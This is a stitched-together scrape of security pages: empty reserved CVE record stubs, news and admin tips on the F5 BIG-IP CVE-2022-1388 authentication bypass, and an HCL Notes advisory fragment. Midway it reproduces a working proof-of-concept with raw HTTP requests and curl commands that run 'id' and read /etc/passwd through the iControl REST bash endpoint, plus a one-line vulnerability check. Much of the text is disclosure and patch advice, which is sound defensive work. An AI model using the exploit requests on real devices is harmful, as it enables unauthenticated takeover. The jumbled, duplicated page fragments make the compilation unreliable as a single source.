**Is the Preview Pane an attack vector for this vulnerability?**

No, the Preview Pane is not an attack vector.

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

\*\* RESERVED \*\* This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

Assigning CNA

N/A

Date Record Created

**20220412**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20220412)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is a record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

CVE-2022-29110: Microsoft Excel Remote Code Execution Vulnerability

CVE-2022-29109: Microsoft Excel Remote Code Execution Vulnerability

**According to the CVSS metric, the attack complexity is high (AC:H). What does that mean for this vulnerability?**

Successful exploitation of this vulnerability requires an attacker to win a race condition.

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

\*\* RESERVED \*\* This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

Assigning CNA

N/A

Date Record Created

**20211216**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20211216)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is a record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

CVE-2022-21972: Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

\*\* RESERVED \*\* This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

Assigning CNA

N/A

Date Record Created

**20220115**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20220115)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is a record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

CVE-2022-23270: Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability

This Tech Tip walks network administrators through the steps to address the latest critical remote code execution vulnerability (CVE-2022-1388) in F5's BIG-IP management interface.

Heads up for network administrators with F5’s BIG-IP family of networking devices in their environment: There is a new security update available for the newly disclosed critical remote code execution vulnerability (CVE-2022-1388). Several security researchers have already created working exploits, so administrators need to move quickly and secure their networks before the attackers come knocking.

According to security researcher Kevin Beaumont, attackers are already trying to exploit the flaw and and dropping webshells. The vulnerability is "trivial" to exploit, Horizon3 said on Twitter. Horizon3 is among the several groups that have already developed a working exploit.

The critical flaw (with a score of 9.8 under the Common Vulnerability Scoring System) affects the BIG-IP iControl REST authentication component, F5 said on May 4. If exploited, remote adversaries can bypass authentication and execute commands with elevated privileges. They could target this vulnerability to gain initial access to the network and move laterally to access other devices on the network.

Considering that BIG-IP devices are widely used in enterprise environments and serve the role of a load balancer, application firewall, and full proxy, this flaw potentially opens enterprise networks to a variety of attacks. Adversaries would be able to steal corporate data, install cryptominers, download and install malware and backdoors, or even disrupt normal business operations by launching a ransomware attack.

**Assessment: Is Your Organization Impacted?**  
BIG-IP is used by 48 of the Fortune 50, F5 says, and there are more than 16,000 instances of BIG-IP discoverable by Shodan. However, the vulnerability affects the management interface, so the vulnerable devices are the ones where the management interface is exposed to the Internet. According to Rapid7 lead security researcher Jacob Baines, that puts the number of affected BIG-IP devices closer to 2,500.

Administrators can execute the following one-line bash command from Randori to determine if their instance of BIG-IP is exploitable (replace the ADDRESS with the host IP in order to execute the command):

HOST=ADDRESS; if curl -s https://$HOST/mgmt/tm \\
--insecure \\
-H "Authorization: Basic YWRtaW46" \\
-H "X-F5-Auth-Token: 1" \\
-H "Connection: X-Forwarded-Host, X-F5-Auth-Token" \\
-H "Content-Length: 0" | grep -q "\\"items\\":\\\["; then printf "\\n\[\*\] $HOST is vulnerable\\n"; else printf "\\n\[\*\] $HOST doesn't appear vulnerable\\n"; fi

The command's output would be either a _\[\*\] 192.168.255.2_ (for example) _is vulnerable_ or _\[\*\] 192.168.255.2 doesn't appear vulnerable_ message.

**Apply the Security Update**  
F5 has released security updates for BIG-IP for the following firmware versions:

*   BIG-IP versions 16.1.0 to 16.1.2
*   BIG-IP versions 15.1.0 to 15.1.5
*   BIG-IP versions 14.1.0 to 14.1.4
*   BIG-IP versions 13.1.0 to 13.1.4

There is no security update being released for firmware versions 11.x and 12.x (11.6.1 to 11.6.5 and 12.1.0 to 12.1.6) as they are no longer supported. Administrators should upgrade to a newer version as soon as possible.

**Apply Mitigations Where Needed**  
F5 released three mitigations for those cases where the BIG-IP devices cannot be updated right away. The mitigations are intended to be a temporary measure — administrators should apply the update, or in the case of an unsupported firmware version, to upgrade to the newer version, as soon as possible.

*   Block iControl REST access through the self IP address
*   Block iControl REST access through the management interface
*   Modify the BIG-IP httpd configuration

How to Check if Your F5 BIG-IP Device Is Vulnerable

F5 BIG-IP remote code execution proof of concept exploit that leverages the vulnerability identified in CVE-2022-1388.

    # F5 BIG-IP RCE exploitation (CVE-2022-1388)POST (1): POST /mgmt/tm/util/bash HTTP/1.1Host: <redacted>:8443Authorization: Basic YWRtaW46Connection: keep-alive, X-F5-Auth-TokenX-F5-Auth-Token: 0{"command": "run" , "utilCmdArgs": " -c 'id' " }curl commandliner: $ curl -i -s -k -X $'POST'-H $'Host: <redacted>:8443' -H $'Authorization: Basic YWRtaW46' -H $'Connection: keep-alive, X-F5-Auth-Token' -H $'X-F5-Auth-Token: 0' -H $'Content-Length: 52' --data-binary $'{\"command\": \"run\" , \"utilCmdArgs\": \" -c \'id\' \" }\x0d\x0a'$'https://<redacted>:8443/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080POST (2):POST /mgmt/tm/util/bash HTTP/1.1Host: <redateced>:8443Authorization: Basic YWRtaW46Connection: keep-alive, X-F5-Auth-TokenX-F5-Auth-Token: 0{"command": "run" , "utilCmdArgs": " -c ' cat /etc/passwd' " }curl commandliner:$ curl -i -s -k -X $'POST'-H $'Host: <redacted>:8443' -H $'Authorization: Basic YWRtaW46' -H $'Connection: keep-alive, X-F5-Auth-Token' -H $'X-F5-Auth-Token: 0'--data-binary $'{\"command\": \"run\" , \"utilCmdArgs\": \" -c \' cat /etc/passwd\' \" }\x0d\x0a\x0d\x0a'$'https://<redacted>/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080Note: Issue could be related between frontend and backend authentication "Jetty" with empty credentials "admin: <empty>" + value of headers ,see "HTTP hop_by_hop request headers"...References and Fixes :* https://support.f5.com/csp/article/K23605346* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388Here the documentation used latest nites:* https://clouddocs.f5.com/api/icontrol-rest/ HTTP hop_by_hop request headers: * https://portswigger.net/research/top-10-web-hacking-techniques-of-2019-nominations-open# AuthorAlex Hernandez aka @_alt3kx_

F5 BIG-IP Remote Code Execution

Users should patch immediately

A proof-of-concept (PoC) has been developed for a critical vulnerability in F5’s BIG-IP networking software which could expose thousands of users to remote takeover.

The vulnerability, tracked as CVE-2022-1388, could allow an attacker to make undisclosed requests to bypass iControl REST authentication.

If exploited, an unauthenticated user could gain remote code execution (RCE) on an affected device.

**Thousands vulnerable**

Disclosed last week, the bug affects multiple versions of the network management software, which is said to be used by more than 35,000 companies.

“This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services,” a security advisory warns.

“There is no data plane exposure; this is a control plane issue only.”

Read more of the latest news about security vulnerabilities

PoCs are now being released for the vulnerability, as threat research teams warn users to patch immediately.

Both PT Swarm and Horizon3 Attack Team have released separate PoCs. Both urge users to apply the fix if possible.

**Mitigations**

F5 has published a list of vulnerable versions and has shared advice on how to protect against the flaw.

The advice reads: “If you are running a version listed in the versions known to be vulnerable column, you can eliminate this vulnerability by installing a version listed in the fixes introduced in column.

“If the fixes introduced in column does not list a version for your branch, then no update candidate currently exists for that branch and F5 recommends upgrading to a version with the fix (refer to the table).

“If the fixes introduced in column lists a version prior to the one you are running, in the same branch, then your version should have the fix.”

RELATED F5 customers urged to patch systems as critical BIG-IP flaw is actively exploited

Paul Bischoff, privacy advocate at Comparitech, commented: “App developers using BIG-IP services should immediately take steps to mitigate the vulnerability until a patch is ready.

“Those steps include blocking access to the iControl REST interface of your BIG-IP system, restricting access only to trusted users and devices, and/or modifying the BIG-IP httpd configuration.

“Apps using BIG-IP can easily be discovered and targeted using a search engine like Shodan, so developers should expect attackers to exploit vulnerable systems in the near future.”

RECOMMENDED F5 warns over ‘critical’ XSS flaw in BIG-IP

BIG-IP: Proof-of-concept released for RCE vulnerability in F5 network management tool

Days after F5 released patches for a critical remote code execution vulnerability affecting its BIG-IP family of products, security researchers are warning that they were able to create an exploit for the shortcoming.
Tracked CVE-2022-1388 (CVSS score: 9.8), the flaw relates to an iControl REST authentication bypass that, if successfully exploited, could lead to remote code execution, allowing

Days after F5 released patches for a critical remote code execution vulnerability affecting its BIG-IP family of products, security researchers are warning that they were able to create an exploit for the shortcoming.

Tracked CVE-2022-1388 (CVSS score: 9.8), the flaw relates to an iControl REST authentication bypass that, if successfully exploited, could lead to remote code execution, allowing an attacker to gain initial access and take control of an affected system.

This could range anywhere from deploying cryptocurrency miners to deploying web shells for follow-on attacks, such as information theft and ransomware.

"We have reproduced the fresh CVE-2022-1388 in F5's BIG-IP," cybersecurity company Positive Technologies said in a tweet on Friday. "Patch ASAP!"

The critical security vulnerability impacts the following versions of BIG-IP products -

*   16.1.0 - 16.1.2
*   15.1.0 - 15.1.5
*   14.1.0 - 14.1.4
*   13.1.0 - 13.1.4
*   12.1.0 - 12.1.6
*   11.6.1 - 11.6.5

Fixes are available in versions 17.0.0, 16.1.2.2, 15.1.5.1, 14.1.4.6, and 13.1.5. Firmware versions 11.x and 12.x will not receive security updates and users relying on those versions should consider upgrading to a newer version or apply the workarounds -

*   Block iControl REST access through the self IP address
*   Block iControl REST access through the management interface, and
*   Modify the BIG-IP httpd configuration

Last month, cybersecurity authorities from Australia, Canada, New Zealand, the U.K., and the U.S. jointly warned that "threat actors aggressively targeted newly disclosed critical software vulnerabilities against broad target sets, including public and private sector organizations worldwide."

With the F5 BIG-IP flaw found trivial to exploit, malicious hacking crews are expected to follow suit, making it imperative that affected organizations apply the patches.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Develop RCE Exploit for the Latest F5 BIG-IP Vulnerability

An issue was discovered in the Sametime chat feature in the Notes 11.0 - 11.0.1 FP4 clients. An authenticated Sametime chat user could cause Remote Code Execution on another chat client by sending a specially formatted message through chat containing Javascript code.

 

 Loading...

Skip to page contentSkip to chat

Skip to page contentSkip to chat

CVE-2021-27760: Knowledge Article View HCL - Customer Support

CVE-2021-27760: Security Bulletin: HCL Notes 11.0 - 11.0.1 FP4 Sametime Embedded chat clients are vulnerable to group chats loading script on restart (CVE-2021-27760)

Tag

#rce